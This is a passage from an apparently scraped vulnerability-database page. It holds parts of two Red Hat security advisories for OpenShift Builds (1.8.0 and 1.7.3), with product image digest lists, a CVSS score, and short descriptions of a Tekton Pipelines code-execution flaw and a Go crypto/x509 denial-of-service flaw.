"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:17546"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/tektoncd/pipeline: Tekton Pipelines: Arbitrary code execution and secret exfiltration via malicious git commands"
}
]
}
RHSA-2026:24359
Vulnerability from csaf_redhat - Published: 2026-06-08 05:19 - Updated: 2026-06-09 08:30Summary
Red Hat Security Advisory: Red Hat OpenShift Builds 1.7.3
Severity
Important
Notes
Topic: Red Hat OpenShift Builds 1.7.3
Details: Releases of Red Hat OpenShift Builds 1.7.3
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in the Go standard library packages `crypto/x509` and `crypto/tls`. During the process of building a certificate chain, an attacker can provide a large number of intermediate certificates. This excessive input is not properly limited, leading to an uncontrolled amount of work being performed. This can result in a denial of service (DoS) condition, making the affected system or application unavailable to legitimate users.
7.5 (High)
Affected products
Fixed
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le | — |
Vendor Fix
fix
|
Known not affected
33 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64 | — | ||
